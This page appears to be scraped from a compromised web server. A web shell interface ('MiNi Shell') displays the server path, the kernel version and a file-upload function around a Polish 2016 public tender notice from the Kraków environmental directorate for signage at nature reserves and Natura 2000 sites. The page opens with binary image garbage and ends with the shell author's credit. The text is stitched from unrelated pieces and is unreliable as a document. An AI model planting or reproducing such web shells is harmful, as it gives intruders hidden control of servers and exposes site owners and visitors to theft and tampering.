JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160704/117315-N-2016.html

<p class="kh_header"><b>Kraków: Oznakowanie tablicami  rezerwatów przyrody i obszarów Natura 2000.</b><br>
<b>Numer ogłoszenia: 117315 - 2016; data zamieszczenia: 04.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalna Dyrekcja Ochrony Środowiska w Krakowie , Plac Na Stawach 3, 30-107 Kraków, woj. małopolskie, tel. 12 619 81 20, 619 81 21, faks 12 619 81 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krakow.rdos.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Oznakowanie tablicami  rezerwatów przyrody i obszarów Natura 2000..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie zostało podzielone na 4 Cześci.
Część I zamówienia: Wykonanie i montaż na gruncie 21 szt. stelaży i 26 szt. tablic do oznaczenia:
1)	rezerwatu przyrody  Kępie na Wyżynie Miechowskiej 
2)	obszaru Natura 2000 Kępie na Wyżynie Miechowskiej PLH120070
3)	rezerwatu przyrody Złota Góra
4)	obszaru Natura 2000 Torfowisko Wielkie Błoto PLH120080
5)	obszaru Natura 2000 Koło Grobli  PLH120008
6)	rezerwatu przyrody Koło
7)	obszaru Natura 2000 Jaroszowiec PLH120006
8)	obszaru Natura 2000 Pustynia Błędowska PLH120014

Część II zamówienia: Wykonanie i montaż na gruncie 12 szt. stelaży i 13 szt. tablic do oznaczenia:
1)	obszaru Natura 2000 Dolny Dunajec PLH120085
2)	obszaru Natura 2000 Biała Tarnowska PLH120090
3)	obszaru Natura 2000 Ostoje nietoperzy okolic Bukowca PLH120020
4)	obszaru Natura 2000 Ostoja w Paśmie Brzanki PLH120047
5)	obszaru Natura 2000 Ostoja Popradzka PLH120019
6)	obszaru Natura 2000 Bedkid Niski PLH180002
7)	obszaru Natura 2000 Ostoje Nietoperzy Beskidu Wyspowego  PLH120052
8)	obszaru Natura 2000 Środkowy Dunajec z Dopływami PLH120088

Część III zamówienia: Wykonanie i montaż na gruncie 24 szt. stelaży i 24 szt. tablic do oznaczania poniższych obszarów  oraz 12 tablic informacyjnych o środowisku przyrodniczym niżej wymienionych obszarów:
1)	obszaru Natura 2000 Uniejów Parcele PLH120075
2)	obszaru Natura 2000 Cybowa Góra PLH120049
3)	obszaru Natura 2000 Giebułtów PLH120051
4)	obszaru Natura 2000 Grzymałów PLH120053
5)	obszaru Natura 2000 Kalina Mała PLH120054 
6)	obszaru Natura 2000 Widnica PLH120076
7)	obszaru Natura 2000 Pstroszyce PLH120073
8)	obszaru Natura 2000 Chodów-Falniów PLH120063
9)	obszaru Natura 2000 Komorów PLH120055
10)	obszaru Natura 2000 Poradów PLH120072
11)	obszaru Natura 2000 Sławice Duchowne PLH120074
12)	obszaru Natura 2000 Kaczmarowe Doły PLH120062
Część IV zamówienia:  Wykonanie i montaż na gruncie 4 stelaży i 4 tablic tematycznych opisujących:
1)	środowisko przyrodnicze Gminy Słaboszów
2)	środowisko przyrodnicze Gminy Książ Wielki
3)	środowisko przyrodnicze Gminy Miechów
4)	środowisko przyrodnicze Gminy Charsznica.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.72-7, 45.42.20.00-1, 45.42.21.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu oceny spełniania warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez wykonawcę oświadczenia, o którym mowa w sekcji III pkt. 1.6 siwz dostępnej na stronie internetowej Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postepowaniu mogą wziąć udział Wykonawcy spełniający warunek posiadania niezbędnej do wykonania zamówienia wiedzy i doświadczenia wyrażającego się wykonaniem w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej jednego zamówienia polegającego na wykonaniu i montażu urządzeń drewnianych (dla zastosowań typu rekreacyjnego, parkowego, infrastruktury turystycznej - np. ławy, ławostoły, tablice informacyjne, altany, itp.) o wartości nie mniejszej niż: 
dla Części I zamówienia:  20 000,00 pln brutto. 
dla Części II zamówienia:  15 000,00 pln brutto.
dla Części III zamówienia:  25 000,00 pln brutto.
dla Części IV zamówienia:  18 000,00 pln brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu oceny spełniania warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez wykonawcę oświadczenia, o którym mowa w sekcji III pkt. 1.6 siwz dostępnej na stronie internetowej Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu oceny spełniania warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez wykonawcę oświadczenia, o którym mowa w sekcji III pkt. 1.6 siwz dostępnej na stronie internetowej Zamawiającego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu oceny spełniania warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez wykonawcę oświadczenia, o którym mowa w sekcji III pkt. 1.6 siwz dostępnej na stronie internetowej Zamawiającego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli oferta będzie podpisana przez pełnomocników, Wykonawca powinien dołączyć do oferty  pełnomocnictwa,  z  treści  których  wynika  umocowanie  do  podpisania  oferty  przez pełnomocników. Wszystkie pełnomocnictwa dołączone do oferty powinny być złożone w formie oryginału lub kopii potwierdzonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 91</li>
<li>2 - okres udzielonej gwarancji - 9</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotna zmiana postanowień umowy jest dopuszczalna gdy:
a.	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację, zakres lub termin wykonania przedmiotu Umowy; 
b.	zaistnieją okoliczności uniemożliwiające terminowe wykonanie Umowy tj. wystąpienie siły wyższej przez co należy rozumieć wydarzenie nieprzewidywalne o charakterze przypadkowym lub naturalnym (żywiołowym), nie do uniknięcia, pozostające poza racjonalną kontrolą Stron, następstwom którego Strony nie mogły zapobiec, uniemożliwiające którejkolwiek ze Stron realizację zobowiązań w ramach niniejszej umowy; strajk nie będzie uznawany za siłę wyższą;
c.	wystąpią niekorzystne warunki atmosferyczne, odbiegające znacząco od typowych, uniemożliwiających prowadzenie robót przez okres co najmniej 14 dni, uniemożliwiających prawidłowe zrealizowanie (jakościowe, terminowe) przedmiotu umowy, pomimo zastosowania wszelkich dostępnych środków technicznych przez Wykonawcę;
d.	konieczna będzie zmiana lokalizacji montażu Towaru w związku z wypowiedzeniem zgody przez właściciela gruntu na jego posadowienie;
2. Zmiany wskazane w pkt 1  będą dopuszczalne wyłącznie w takim zakresie, w jakim ukończenie przedmiotu umowy jest lub przewiduje się, że będzie, opóźnione na skutek tych działań.
3. Zamawiający dopuszcza istotna zmianę Umowy w zakresie sposobu realizacji, zakresu lub terminu wykonania Umowy, w związku z koniecznością dostosowania realizacji Umowy do  aktów prawa miejscowego - uchwał rady gminy podjętej na podstawie  Art. 37a ustawy z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym tj. z dnia 13 maja 2016 r. (Dz.U. z 2016 r. poz. 778) , a dotyczącej  zasad i warunkach sytuowania obiektów małej architektury.
4. Jeżeli zmiany określone w pkt. 3 polegać będą na ograniczeniu ilości Towaru, Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części Umowy. W okolicznościach określonych w zdaniu poprzedzającym wynagrodzenie Wykonawcy zostanie ustalone w oparciu o kosztorys, o którym mowa w § 5 ust. 1 lit g umowy stanowiącej załącznik nr 6 do siwz.
5. Istotne zmiany umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.krakow.rdos.gov.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> REGIONALNA DYREKCJA OCHRONY ŚRODOWISKA W KRAKOWIE
Plac Na Stawach 3, 30-107 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2016 godzina 10:00, miejsce: Regionalna Dyrekcja Ochrony Środowiska w Krakowie, Plac Na Stawach 3, 30 -107 Kraków pokój nr 218 (sekretariat )..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie w zakresie Części III i IV jest realizowane w ramach projektu LIFE12 NAT PL 000053: Ochrona siedlisk kserotermicznych w obszarach Natura 2000 na Wyżynie Miechowskiej. Zamówienie jest finansowane ze środków Instrumentu Finansowego LIFE+ przez Unię Europejską oraz NFOŚiGW.
Zamówienie w zakresie Części I i II jest realizowane w ramach projektu: Oznakowanie rezerwatów przyrody i obszarów Natura 2000 w Małopolsce - etap III, finansowanego ze środków budżetowych Regionalnej Dyrekcji Ochrony Środowiska w Krakowie i Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Krakowie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I zamówienia: Wykonanie i montaż na gruncie 21 szt. stelaży i 26 szt. tablic do oznaczenia:
1)	rezerwatu przyrody  Kępie na Wyżynie Miechowskiej 
2)	obszaru Natura 2000 Kępie na Wyżynie Miechowskiej PLH120070
3)	rezerwatu przyrody Złota Góra
4)	obszaru Natura 2000 Torfowisko Wielkie Błoto PLH120080
5)	obszaru Natura 2000 Koło Grobli  PLH120008
6)	rezerwatu przyrody Koło
7)	obszaru Natura 2000 Jaroszowiec PLH120006
8)	obszaru Natura 2000 Pustynia Błędowska PLH120014.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.72-7, 45.42.20.00-1, 45.42.21.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II zamówienia: Wykonanie i montaż na gruncie 12 szt. stelaży i 13 szt. tablic do oznaczenia:
1)	obszaru Natura 2000 Dolny Dunajec PLH120085
2)	obszaru Natura 2000 Biała Tarnowska PLH120090
3)	obszaru Natura 2000 Ostoje nietoperzy okolic Bukowca PLH120020
4)	obszaru Natura 2000 Ostoja w Paśmie Brzanki PLH120047
5)	obszaru Natura 2000 Ostoja Popradzka PLH120019
6)	obszaru Natura 2000 Bedkid Niski PLH180002
7)	obszaru Natura 2000 Ostoje Nietoperzy Beskidu Wyspowego  PLH120052
8)	obszaru Natura 2000 Środkowy Dunajec z Dopływami PLH120088.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.72-7, 45.42.20.00-1, 45.42.21.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III zamówienia: Wykonanie i montaż na gruncie 24 szt. stelaży i 24 szt. tablic do oznaczania poniższych obszarów  oraz 12 tablic informacyjnych o środowisku przyrodniczym niżej wymienionych obszarów:
1)	obszaru Natura 2000 Uniejów Parcele PLH120075
2)	obszaru Natura 2000 Cybowa Góra PLH120049
3)	obszaru Natura 2000 Giebułtów PLH120051
4)	obszaru Natura 2000 Grzymałów PLH120053
5)	obszaru Natura 2000 Kalina Mała PLH120054 
6)	obszaru Natura 2000 Widnica PLH120076
7)	obszaru Natura 2000 Pstroszyce PLH120073
8)	obszaru Natura 2000 Chodów-Falniów PLH120063
9)	obszaru Natura 2000 Komorów PLH120055
10)	obszaru Natura 2000 Poradów PLH120072
11)	obszaru Natura 2000 Sławice Duchowne PLH120074
12)	obszaru Natura 2000 Kaczmarowe Doły PLH120062.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.72-7, 45.42.20.00-1, 45.42.21.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Cześć IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część IV zamówienia:  Wykonanie i montaż na gruncie 4 stelaży i 4 tablic tematycznych opisujących:
1)	środowisko przyrodnicze Gminy Słaboszów
2)	środowisko przyrodnicze Gminy Książ Wielki
3)	środowisko przyrodnicze Gminy Miechów
4)	środowisko przyrodnicze Gminy Charsznica.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.72-7, 45.42.20.00-1, 45.42.21.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com